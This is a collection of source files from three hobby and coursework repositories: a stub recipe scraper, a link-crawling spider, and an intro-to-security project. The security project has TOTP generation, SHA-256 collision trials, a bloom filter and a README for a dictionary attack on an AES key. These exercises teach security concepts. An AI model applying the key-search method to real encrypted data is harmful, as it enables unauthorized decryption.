"length_bytes": 2785,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 98,
"path": "/recipe_finder/html_parsers/bon_apetit_parsers.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\n\nfrom .abc_parsers import Parser\n\n\nclass BonApetitParser(Parser):\n\n def __init__(self):\n pass\n\n def bon_apetit_2020(self):\n \"\"\"\n Parse the newest page as of 4/1/2020 and return the final\n init data structure.\n \"\"\"\n pass\n\n def bon_apetit_2010(self):\n \"\"\"\n Parse the oldest page, circa 2010 and return the final init data\n structure.\n \"\"\"\n pass\n\n def bon_apetit_slideshow(self):\n \"\"\"\n Get all href tags in the slideshow page, sort them with regex,\n send those to be parsed in the right place.\n \"\"\"\n pass\n\n\nif __name__ == '__main__':\n pass\n\n\n\n\n# resps = self.multithread_requests([url])\n# resp, url = resps[0]\n# strainer = SoupStrainer('a', href=True)\n# soup = BeautifulSoup(\n# resp,\n# features='lxml',\n# parse_only=strainer,\n# )\n# hrefs = soup.find_all('a', href=True)\n\n# rl = []\n# for hr in hrefs:\n# try:\n# if hr['href'][4] == 's':\n# if hr['href'][26:33] == 'recipe/':\n# rl.append(hr.contents[0])\n# if hr['href'][4] == ':':\n# if hr['href'][27:34] == 'recipe/':\n# rl.append(hr.contents[0])\n# except IndexError:\n# logging.debug(f'href {hr} failed.')\n\n\n\n\n\n\n\n\n\n # for parent_url, urls in lol_parent_children:\n # logging.debug(f'start case parent_url {parent_url}')\n # logging.debug(f'startcase urls {urls}')\n\n # recipe_urls = [i for i in urls if i[27:34] == 'recipe/']\n # recipe_page_urls = [i for i in urls if i[27:34] == 'recipes']\n\n # logging.debug(f'Recipe urls to start: \\n{recipe_urls}')\n # logging.debug(f'Rec Page URLs to look at: \\n{recipe_page_urls}')\n\n # for rp_url in recipe_page_urls:\n # recipe_urls += self.scrape_recipes_from_page(rp_url)\n # logging.debug(\n # f'Got some recipe urls from {rp_url}: {recipe_urls}'\n # )\n\n # for index, url in enumerate(recipe_urls):\n # logging.debug(f'Recipe Found: {url}')\n # date_string = self.parse_parent(parent_url)\n # key = date_string + ' ' + str(index)\n # name = url[34:].replace('-', ' ').title()\n # logging.debug('indicator')\n # self.url_dict[key] = {\n # 'name': name,\n # 'url': url,\n # 'neighbors': recipe_urls,\n # 'parent_url': parent_url\n # }\n\n # logging.debug(self.url_dict)"
},
{
"alpha_fraction": 0.7730560302734375,
"alphanum_fraction": 0.7730560302734375,
"avg_line_length": 34.709678649902344,
"blob_id": "a53c940fe61df6af2da6e24540e6b6c5fc706303",
"content_id": "1cf9ddbd53d507c525e735e9d443dffadbdf1642",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1106,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 31,
"path": "/recipe_finder/html_parsers/__init__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nThis module is the glue that binds site_crawlers and recipe_objects. Site\ncrawlers only crawls through the website, and downloads data to the hard disk.\nRecipe objects is only a clean object that possesses recipe attributes. For\nexample, recipe name, recipe ingredients, etc.\n\nThis parser module recieves the html pages from the site crawler, and returns\na clean, and uniform data structure which can be passed to recipe_objects.\n\nIf this project is developed into a django web app, the database models will\nprobably be directly hooked to parsers, and updated on a schedule.\n\nUltimately, from the html mess that site crawlers delivers, this module should\nreturn the following information for each recipe:\n\n * Recipe Name\n * Recipe URL\n * Recipe Ingredients\n\nAdditionally, this module may return some optional information, and downstream\nmodules should understand that this information may or may not be included for\neach recipe:\n\n * Recipe Author\n * Recipe Prep Time\n * (add add'l optional attributes, if encountered)\n\n\"\"\"\n\nfrom .bon_apetit_parsers import BonApetitParser"
},
{
"alpha_fraction": 0.8461538553237915,
"alphanum_fraction": 0.8461538553237915,
"avg_line_length": 38,
"blob_id": "ba8f537e066ac7e9687da2a163df0aa09d51c39a",
"content_id": "84a9f9d56a20d1f9879af6320faf816ecf545e24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 39,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 1,
"path": "/README.md",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "Scrape every recipe from bonapetit.com\n"
},
{
"alpha_fraction": 0.6146341562271118,
"alphanum_fraction": 0.6146341562271118,
"avg_line_length": 21.83333396911621,
"blob_id": "bc3013c6b84351a7df8aa40a2c52902660ab00a8",
"content_id": "e561b80f8c9adb15dae5e7d5dc5f9a18b46ee8e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 410,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 18,
"path": "/recipe_finder/site_crawlers/__init__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nThis module crawls through websites that have recipes, and caches recipe pages\nfor later analysis by the html parsers.\n\n\"\"\"\n\nfrom .ba_crawl import BonApetitCrawler\n\nclass DebugContext:\n ba_context = {\n 'site name': 'Bon Apetit',\n 'cache key': 'BA Cache',\n 'url cache key': 'all_urls',\n 'read cache': False,\n 'debug mode': True,\n 'read debug cache': True,\n }"
},
{
"alpha_fraction": 0.5328719615936279,
"alphanum_fraction": 0.5420991778373718,
"avg_line_length": 38.45454406738281,
"blob_id": "4b5bf527a2b81fec404eb7630b9511f47d24f14e",
"content_id": "24701c4d7e8e550ff1b6412c6d8d7189a8e6c628",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 867,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 22,
"path": "/recipe_finder/html_parsers/abc_parsers.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from abc import ABC, abstractmethod\n\n\nclass Parser(ABC):\n def __init__(self, cache_info):\n \"\"\"\n Cache info comes in from the site crawler module. It tells this module:\n\n * where to find html pages to parse\n * what are the broad categories that it has pre-sorted html pages\n into (ideally, recipe pages, and not recipe pages)\n * when was the cache last downloaded.\n\n This information comes in via a dictionary; for example:\n\n {'html_dir': the directory\n 'supercats': {'other urls': {'avg_creation_date': datetime object\n 'num_of_files': 3390},\n 'recipe pages': {'avg_creation_date': datetime object,\n 'num_of_files': 8550}}}\n \"\"\"\n self.cache_info = cache_info"
}
] | 14 |
Anorpi/python_spider
|
https://github.com/Anorpi/python_spider
|
b92f508588d64148e63a3a8b9900fcdddb3cb28e
|
bea09d88dfc1889a98fa3151061dab2c4cbf13f0
|
e37ddb1e93ea803edd2378f28a9dc94a68296039
|
refs/heads/master
| 2020-06-23T21:32:43.917310 | 2016-11-27T09:37:41 | 2016-11-27T09:37:41 | 74,635,499 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6992126107215881,
"alphanum_fraction": 0.7023621797561646,
"avg_line_length": 38.625,
"blob_id": "d2c609383b129394a998433e7b4e74959a57b9a8",
"content_id": "1da83646e3669c9272945d404e03de6c85f77e2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 635,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 16,
"path": "/findInter.py",
"repo_name": "Anorpi/python_spider",
"src_encoding": "UTF-8",
"text": "import requests,re\nimport urlparse\nfrom bs4 import BeautifulSoup\n\ndef webInter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webInterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n #find 'href' start head '/',at least 2 characters\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^/..*\")):\n if newWebUrl is not None:\n\t webInterList.add(urlparse.urlparse(webUrl).scheme + \"://\" + urlparse.urlparse(webUrl).netloc + newWebUrl.attrs['href'])\n\n return webInterList\n\n"
},
{
"alpha_fraction": 0.6717612743377686,
"alphanum_fraction": 0.6732168793678284,
"avg_line_length": 31.66666603088379,
"blob_id": "4a1996a31f18ad91b5b7eec30393efa63e2104b9",
"content_id": "3a27a297e54bba70fbfdd3426626812fa5a6a622",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1374,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 42,
"path": "/webtest.py",
"repo_name": "Anorpi/python_spider",
"src_encoding": "UTF-8",
"text": "import requests,re\nimport urlparse\nfrom bs4 import BeautifulSoup\n\ndef webInter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webInterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n #find 'href' start head '/',at least 2 characters\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^/..*\")):\n if newWebUrl is not None:\n\t webInterList.add(urlparse.urlparse(webUrl).scheme + \"://\" + urlparse.urlparse(webUrl).netloc + newWebUrl.attrs['href'])\n\n return webInterList\n\ndef webOuter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webOuterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n # find 'href' start head 'http' or 'www'\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(http|www).*\")):\n # for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(?!/)+.*\")):\n if newWebUrl is not None:\n webOuterList.add(newWebUrl.attrs['href'])\n\n return webOuterList\n#c=input()\nc = 'http://www.google.com'\nprint c\nb=webInter(c)\nprint \"webInter is:\"\nfor x in b:\n print x\n\na=webOuter(c)\nprint \"webOuter is:\"\nfor y in a:\n print y\n\n\n"
},
{
"alpha_fraction": 0.6588628888130188,
"alphanum_fraction": 0.6608695387840271,
"avg_line_length": 32.22222137451172,
"blob_id": "a6042c5dc043a463873e88d24a68b8d2abd163b2",
"content_id": "3eeaf3d063f578b39ff0060d38464871d2d550b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1495,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 45,
"path": "/webprobe.py",
"repo_name": "Anorpi/python_spider",
"src_encoding": "UTF-8",
"text": "import requests,re\nimport urlparse\nfrom bs4 import BeautifulSoup\n\ndef webInter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webInterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n #find 'href' start head '/',at least 2 characters\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^/(?!/)..*\")):\n if newWebUrl is not None:\n\t webInterList.add(urlparse.urlparse(webUrl).scheme + \"://\" + urlparse.urlparse(webUrl).netloc + newWebUrl.attrs['href'])\n\n return webInterList\n\ndef webOuter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webOuterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n # find 'href' start head 'http' or 'www'\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(http|www).*\")):\n # for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(?!/)+.*\")):\n if newWebUrl is not None:\n webOuterList.add(newWebUrl.attrs['href'])\n\n return webOuterList\n#c=input()\nwebUrl = 'http://www.google.com/advanced_search?hl=en&authuser=0'\nprint \"webUrl is:\" + webUrl\nfor x in webInter(webUrl):\n print \"x is:\" + x\n # for xx in webInter(x):\n # print \"xx is:\" + xx\n \n\n#a=webOuter(c)\n#print \"webOuter is:\"\n#for y in a:\n# print y\n#\n#\n"
},
{
"alpha_fraction": 0.6734693646430969,
"alphanum_fraction": 0.6750392317771912,
"avg_line_length": 36.52941131591797,
"blob_id": "139fb72c67ecfe786d2032802184c6fa0c98a0c0",
"content_id": "a122439f1f8d2b76126d6f87cceaad3f504e5869",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 637,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 17,
"path": "/findOuter.py",
"repo_name": "Anorpi/python_spider",
"src_encoding": "UTF-8",
"text": "import requests,re\n#import urlparse\nfrom bs4 import BeautifulSoup\n\ndef webOuter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webOuterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n # find 'href' start head 'http' or 'www'\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(http|www).*\")):\n # for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(?!/)+.*\")):\n if newWebUrl is not None:\n webOuterList.add(newWebUrl.attrs['href'])\n\n return webOuterList"
}
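The four files above all revolve around the same two regexes: internal links are `href` values that start with '/' and get re-rooted on the page's scheme and host, while external links start with 'http' or 'www'. A minimal Python 3 sketch of that logic (in Python 3, `urlparse` lives in `urllib.parse`; `requests` and `bs4` are the same dependencies the files already use):

```python
import re
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse

def internal_links(web_url):
    """Python 3 port of webInter(): absolute-ize hrefs that start with '/'."""
    soup = BeautifulSoup(requests.get(web_url).text, "lxml")
    parts = urlparse(web_url)
    return {parts.scheme + "://" + parts.netloc + a.attrs['href']
            for a in soup.find_all('a', href=re.compile(r"^/(?!/)..*"))}

def external_links(web_url):
    """Python 3 port of webOuter(): keep hrefs starting with http or www."""
    soup = BeautifulSoup(requests.get(web_url).text, "lxml")
    return {a.attrs['href']
            for a in soup.find_all('a', href=re.compile(r"^(http|www).*"))}
```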
] | 4 |
lekevin678/Intro-to-Security
|
https://github.com/lekevin678/Intro-to-Security
|
693548cfb34876925bea2f2ca46244186b3a21ca
|
17c5d46461859da60dbb9f46a89541fecf01e777
|
ad27a0e591877da3e2c79756a18961273d592450
|
refs/heads/main
| 2023-01-23T03:46:20.599745 | 2020-12-02T05:57:32 | 2020-12-02T05:57:32 | 317,762,982 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7328519821166992,
"alphanum_fraction": 0.7472923994064331,
"avg_line_length": 20.30769157409668,
"blob_id": "ea1491b66360a9a1695800b2b7e68ca1eb48c40b",
"content_id": "5c20fd05023c62732a810a6829f07d707c7cca92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 13,
"path": "/Google Authenticator TOTP/README.md",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "# Google Authenticator\n\nImplements TOTP (Time-based One Time Password). Generates QR code to scan to use with Google Authenticator.\n\nCompile & Run:\n\n1.) Generate QR\n python3 totp.py generate\n \n2.) Get Code\n python3 totp.py get\n\nSkills: Python, HMAC, Hash, One Time Password\n"
},
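The two commands in the README map onto the standard TOTP recipe implemented by `totp.py` below: derive a counter from the current 30-second window, HMAC-SHA1 it with the base32-decoded secret, then dynamically truncate to 6 digits. A self-contained sketch of that core computation (RFC 6238 style), reusing the demo secret from the script:

```python
import base64, hashlib, hmac, struct, time

def totp_now(secret_b32, time_step=30, digits=6):
    counter = int(time.time() // time_step)               # 30-second window
    key = base64.b32decode(secret_b32)
    digest = hmac.new(key, struct.pack('>Q', counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                            # dynamic truncation
    code = struct.unpack('>I', digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp_now('JBSWY3DPEHPK3PXP'))  # same demo secret as totp.py below
```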
{
"alpha_fraction": 0.5116721987724304,
"alphanum_fraction": 0.5331109762191772,
"avg_line_length": 20.84375,
"blob_id": "29b2542fe83a290abbdaaf67021a5728d2486812",
"content_id": "27a72516181a3c8b89de2d92d343cc537abeb4a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2099,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 96,
"path": "/Google Authenticator TOTP/totp.py",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "import sys\nimport math\nimport time\n\nimport hmac\nimport hashlib\nimport base64\nimport struct\n\nimport pyqrcode\n\nclass TOTP:\n\n def getCounter(self):\n currTime = time.time()\n temp = math.floor( (currTime - 0) / self.ga.timeStep)\n return temp\n\n \n def getHash(self):\n key = self.ga.secret\n counter = self.getCounter()\n \n k = base64.b32decode(key)\n counter = struct.pack('>q', counter)\n\n myHash = hmac.new(k, counter, hashlib.sha1)\n myByteArrayHash = bytearray(myHash.digest())\n\n binaryArr = []\n for c in myByteArrayHash:\n bits = bin(c)[2:]\n bits = '00000000'[len(bits):] + bits\n binaryArr.extend([int(b) for b in bits])\n\n binary = \"\"\n for i in binaryArr:\n binary += str(i)\n\n return binary\n\n def truncate(self, s):\n lastFour = s[len(s)-4:]\n\n offset = int(lastFour, 2)\n\n charOffset = (offset * 8) + 1\n return s[charOffset:charOffset+31]\n\n\n def start(self):\n hotp = self.truncate( self.getHash())\n hotp = int(hotp, 2)\n hotp = hotp % (pow(10, 6))\n self.code = '000000'[len(str(hotp)):] + str(hotp)\n self.code = self.code[:3] + \" \" + self.code[3:]\n\n def __init__(self, ga):\n self.ga = ga\n\nclass GoogleAuth:\n\n def generateQR(self):\n s = \"otpauth://totp/Provider1:\" + self.email + \"?secret=\" + self.secret + \"&issuer=Provider1\"\n url = pyqrcode.create(s) \n url.svg(\"QR-Code.svg\", scale = 8) \n\n \n def getOTP(self):\n otp = TOTP(self)\n while True:\n otp.start()\n print(otp.code)\n time.sleep(30)\n \n\n\n def __init__(self, time, length, email, secret):\n self.timeStep = time\n self.passwordLen = length\n self.email = email\n self.secret = secret\n\n\nemail = \"[email protected]\"\nsecret = \"JBSWY3DPEHPK3PXP\"\n\nif len(sys.argv) == 2:\n ga = GoogleAuth(30, 6, email, secret)\n arg = sys.argv[1]\n\n if arg == \"generate\":\n ga.generateQR()\n\n elif arg == \"get\":\n ga.getOTP()\n\n\n"
},
{
"alpha_fraction": 0.7461538314819336,
"alphanum_fraction": 0.7679487466812134,
"avg_line_length": 69.81818389892578,
"blob_id": "a37fb32a9956bcb0529e084020daa8a1d09b8990",
"content_id": "1321d68c66c7b8f7638cb8eb1100461675a6d1b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 784,
"license_type": "no_license",
"max_line_length": 570,
"num_lines": 11,
"path": "/Dictionary-Attack/README.md",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "# Dictionary-Attack\n\nYou are given a plaintext and a ciphertext, you know that aes-128-cbc is used to generate the ciphertext from the plaintext, and you also know that the numbers in the IV are all zeros (not the ASCII character ‘0’). Another clue that you have learned is that the key used to encrypt this plaintext is an English word shorter than 16 characters; the word that can be found from a typical English dictionary. Since the word has less than 16 characters (i.e. 128 bits), space characters (hexadecimal value 0x20) are appended to the end of the word to form a key of 128 bits.\nYour goal is to write a program to find out this key.\n\nTo Compile:\n gcc dict_attack.c -o attack -lssl -lcrypto\nTo Run:\n ./attack\n\nSkills: C, Encryption/Decryption, Encryption Modes \n"
},
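For comparison with the repo's C implementation (`dict_attack.c` further below), the same attack is compact in Python: pad each candidate word with spaces (0x20) to 16 bytes, AES-128-CBC-encrypt the known plaintext under an all-zero IV, and compare against the known ciphertext. A sketch assuming the `cryptography` package and the repo's `words.txt` wordlist:

```python
# Sketch only; assumes `pip install cryptography` and the repo's words.txt.
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

PLAINTEXT = b'This is a top secret.'
CIPHERTEXT = bytes.fromhex('8d20e5056a8d24d0462ce74e4904c1b5'
                           '13e10d1df4a2ef2ad4540fae1ca0aaf9')
IV = b'\x00' * 16

def try_key(word):
    key = word.ljust(16, ' ').encode()       # pad with 0x20 up to 128 bits
    padder = padding.PKCS7(128).padder()     # match EVP's default padding
    data = padder.update(PLAINTEXT) + padder.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(IV)).encryptor()
    return enc.update(data) + enc.finalize() == CIPHERTEXT

with open('words.txt') as f:
    for word in f:
        word = word.strip()
        if len(word) < 16 and try_key(word):
            print('FOUND KEY:', repr(word))
            break
```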
{
"alpha_fraction": 0.5389497876167297,
"alphanum_fraction": 0.5510675311088562,
"avg_line_length": 26.695999145507812,
"blob_id": "d6a29ccfae863ade9ed09fa32865ed64fb8b55ea",
"content_id": "43cc88601a0efed05dd68c4207722ee007c01da5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3466,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 125,
"path": "/Hash-Resistance-Properties/hash-resistance.py",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "from cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.backends import default_backend\n\nimport random\nimport string\nimport time\n\nclass Hash:\n def get_random_string(self, randNum):\n letters = string.ascii_lowercase\n result_str = ''.join(random.choice(letters) for i in range(randNum))\n return result_str\n\n def find_hash(self, s):\n digest = hashes.Hash(hashes.SHA256(), backend=default_backend())\n digest.update(s)\n temp = digest.finalize()\n hexString = \"\"\n for i in temp:\n hexString = hexString + (i.encode(\"hex\"))\n \n return hexString[0:3]\n\n\nclass Hash_Weak(Hash):\n randS__Key = \"\"\n hash__Key = \"\"\n\n def runTrials(self, i):\n print(\"Run (%d) Key: %s\" % (i , self.hash__Key))\n \n trialNum = 0\n foundMatch = False \n\n while (foundMatch == False):\n randNum = random.randint(2,100);\n randomWord = self.get_random_string(randNum)\n randomHash = self.find_hash(randomWord)\n\n if randomWord==self.randS__Key:\n continue\n\n trialNum += 1\n\n if randomHash==self.hash__Key:\n print(\" *****FOUND MATCH*****\")\n print(\" Strings:\\t%s != %s\" % (self.randS__Key, randomWord))\n print(\" Hashes:\\t%s == %s\" % (self.hash__Key, randomHash ))\n print(\"\\n Number of Trials: %d\\n\" % trialNum )\n foundMatch = True\n \n else:\n continue\n\n return trialNum\n\n def __init__(self):\n randNum = random.randint(2,100);\n self.randS__Key = self.get_random_string(randNum)\n self.hash__Key = self.find_hash(self.randS__Key)\n \nclass Hash_Strong(Hash):\n hashDict = dict()\n\n def runTrials(self, i):\n print(\"Run (%d)\" % (i))\n \n trialNum = 0\n foundMatch = False \n\n while (foundMatch == False):\n randomNum = random.randint(2,100);\n randomWord = self.get_random_string(randomNum)\n randomHash = self.find_hash(randomWord)\n\n if randomHash in self.hashDict:\n if self.hashDict[randomHash]==randomWord:\n continue\n\n trialNum += 1\n end = time.time()\n print(\" *****FOUND MATCH*****\")\n print(\" Trials: %d\" % trialNum )\n foundMatch = True\n \n else:\n trialNum += 1\n self.hashDict[randomHash] = randomWord\n\n self.hashDict.clear()\n return trialNum\n\n\n\nprint(\"HOW MANY TRAILS WILL I TAKE TO BREAK SHA_256 STRONG COLLISION RESISTANCE (ONLY FIRST 24 BITS OF HASH)? \\n\")\ni = 0\nstrong_average = 0\n\nwhile(i < 10):\n i += 1\n one = Hash_Strong()\n strong_average += one.runTrials(i)\n\nstrong_average = strong_average / i\nprint(\"\\n\\nAVERAGE NUMBER OF TRIALS: %d\\n\\n\" % strong_average)\n\n\n\n\n\nprint(\"HOW MANY TRAILS WILL I TAKE TO BREAK SHA_256 WEAK COLLISION RESISTANCE (ONLY FIRST 24 BITS OF HASH)? \\n\")\ni = 0\nweak_average = 0\n\nwhile(i < 10):\n i += 1\n one = Hash_Weak()\n weak_average += one.runTrials(i)\n\nweak_average = weak_average / i\nprint(\"\\n\\nAVERAGE NUMBER OF TRIALS: %d\" % weak_average)\n\n\nprint(\"\\n\\nSTRONG COLLISION RESISTANCE AVERAGE - %d trials\" % strong_average)\nprint(\"WEAK COLLISION RESISTANCE AVERAGE - %d trials\" % weak_average)\n\n\n\n\n"
},
{
"alpha_fraction": 0.7859007716178894,
"alphanum_fraction": 0.8067885041236877,
"avg_line_length": 53.71428680419922,
"blob_id": "ddc422fc2bba58c818aa8c7cb92bd084af729fa1",
"content_id": "79655731d4d5506ee621021770ef943b00320fe7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 383,
"license_type": "no_license",
"max_line_length": 240,
"num_lines": 7,
"path": "/Hash-Resistance-Properties/README.md",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "# Hash-Resistance-Properties\nTest the weak-resistance and strong-resistance properties of SHA-256. Only uses the first 24 bits of the hashes. Both weak-resistance and strong-resistance runs 100 times and the average number of trials to break the property is calculated.\n\nTo Compile and Run:\n python hash-resistance.py\n \nSkills: Python, Object-Oriented Design, Cryptographic Hashes\n"
},
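The experiment in this README has well-known theoretical expectations: matching a fixed 24-bit digest (the weak property) takes about 2^24 attempts on average, while the birthday paradox drops finding any collision (the strong property) to roughly sqrt(pi/2 * 2^24), about 5,100 attempts. A quick sanity check of those numbers:

```python
import math

bits = 24
space = 2 ** bits
print('weak (match a fixed 24-bit digest):', space)          # 16,777,216
print('strong (any collision, birthday bound): %.0f'
      % math.sqrt(math.pi / 2 * space))                      # ~5,133
```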
{
"alpha_fraction": 0.5725051760673523,
"alphanum_fraction": 0.6237006187438965,
"avg_line_length": 22.85093116760254,
"blob_id": "5aa0d53d956410f9de444f21dc212ccd15ed9227",
"content_id": "c196c456212df8198c812cead9c47763aa6b4eec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3848,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 161,
"path": "/Bloom Filter/bloom_filter.py",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport string\nimport time\nimport sys\n\ndef hash__SHA1(word):\n m = hashlib.sha1(word)\n return m.hexdigest()\n\ndef hash__SHA256(word):\n m = hashlib.sha256(word)\n return m.hexdigest()\n\ndef hash__SHA3256(word):\n m = hashlib.sha3_256(word)\n return m.hexdigest()\n\ndef hash__MD5(word):\n m = hashlib.md5(word)\n return m.hexdigest()\n\ndef hash__BLAKE2b(word):\n m = hashlib.blake2b(word)\n return m.hexdigest() \n\ndef bloomSetup(bloomFilter__5, bloomFilter__3, bloomLength , f):\n for i in f:\n plainText = i.rstrip()\n hString = hash__SHA1(plainText) \n index_SHA1 = int(hString, 16) % bloomLength\n \n\n hString = hash__SHA256(plainText) \n index_SHA256 = int(hString, 16) % bloomLength\n\n hString = hash__SHA3256(plainText) \n index_SHA3 = int(hString, 16) % bloomLength\n \n\n hString = hash__MD5(plainText) \n index_MD5 = int(hString, 16) % bloomLength\n \n\n hString = hash__BLAKE2b(plainText) \n index_BLAKE = int(hString, 16) % bloomLength\n\n\n bloomFilter__5[index_SHA1] = 1\n\n bloomFilter__5[index_SHA256] = 1\n bloomFilter__3[index_SHA256] = 1\n\n bloomFilter__5[index_SHA3] = 1\n bloomFilter__3[index_SHA3] = 1\n\n bloomFilter__5[index_MD5] = 1\n bloomFilter__3[index_MD5] = 1\n\n bloomFilter__5[index_BLAKE] = 1\n\ndef bloomCheck__5(bloomFilter__5, bloomLength, s):\n hString = hash__SHA1(s) \n index_SHA1 = int(hString, 16) % bloomLength\n\n hString = hash__SHA256(s) \n index_SHA256 = int(hString, 16) % bloomLength\n\n hString = hash__SHA3256(s) \n index_SHA3 = int(hString, 16) % bloomLength\n \n hString = hash__MD5(s) \n index_MD5 = int(hString, 16) % bloomLength\n \n hString = hash__BLAKE2b(s) \n index_BLAKE = int(hString, 16) % bloomLength\n\n if(bloomFilter__5[index_SHA1] == 1 and bloomFilter__5[index_SHA256] == 1 and bloomFilter__5[index_SHA3] == 1 and bloomFilter__5[index_MD5] == 1 and bloomFilter__5[index_BLAKE] == 1):\n return 1\n else:\n return 0\n\ndef bloomCheck__3(bloomFilter__3, bloomLength, s):\n hString = hash__SHA256(s) \n index_SHA256 = int(hString, 16) % bloomLength\n\n hString = hash__SHA3256(s) \n index_SHA3 = int(hString, 16) % bloomLength\n \n hString = hash__MD5(s) \n index_MD5 = int(hString, 16) % bloomLength\n\n if(bloomFilter__3[index_SHA256] == 1 and bloomFilter__3[index_SHA3] == 1 and bloomFilter__3[index_MD5] == 1):\n return 1\n else:\n return 0\n\ndictArg = sys.argv[2]\ninputArg = sys.argv[4]\noutput3Arg = sys.argv[6]\noutput5Arg = sys.argv[7]\n\nbloomLength = 2364657\nbloomFilter__5 = [0] * bloomLength\nbloomFilter__3 = [0] * bloomLength\n\ndictionary = open(dictArg, \"r+b\");\nbloomSetup(bloomFilter__5, bloomFilter__3, bloomLength, dictionary)\n\n\n\ninputFile = open(inputArg, \"r+b\")\nnum = int(inputFile.readline().rstrip())\ninputWords = []\n\nfor i in range(num):\n inputWords.append(inputFile.readline().rstrip())\n\nout3 = open(output3Arg, \"w\")\nfor i in inputWords:\n isBad = bloomCheck__3(bloomFilter__3, bloomLength, i)\n\n if (isBad == 1):\n out3.write(\"maybe\\n\")\n else:\n out3.write(\"no\\n\")\n\nout5 = open(output5Arg, \"w\")\nfor i in inputWords:\n isBad = bloomCheck__5(bloomFilter__5, bloomLength, i)\n\n if (isBad == 1):\n out5.write(\"maybe\\n\")\n else:\n out5.write(\"no\\n\")\n\n\n\n\n\n\n#find time for one password\ndictionary.seek(0)\ntest = dictionary.readline().rstrip()\n\nstart = time.time()\nbloomCheck__3(bloomFilter__3, bloomLength, i)\nend = 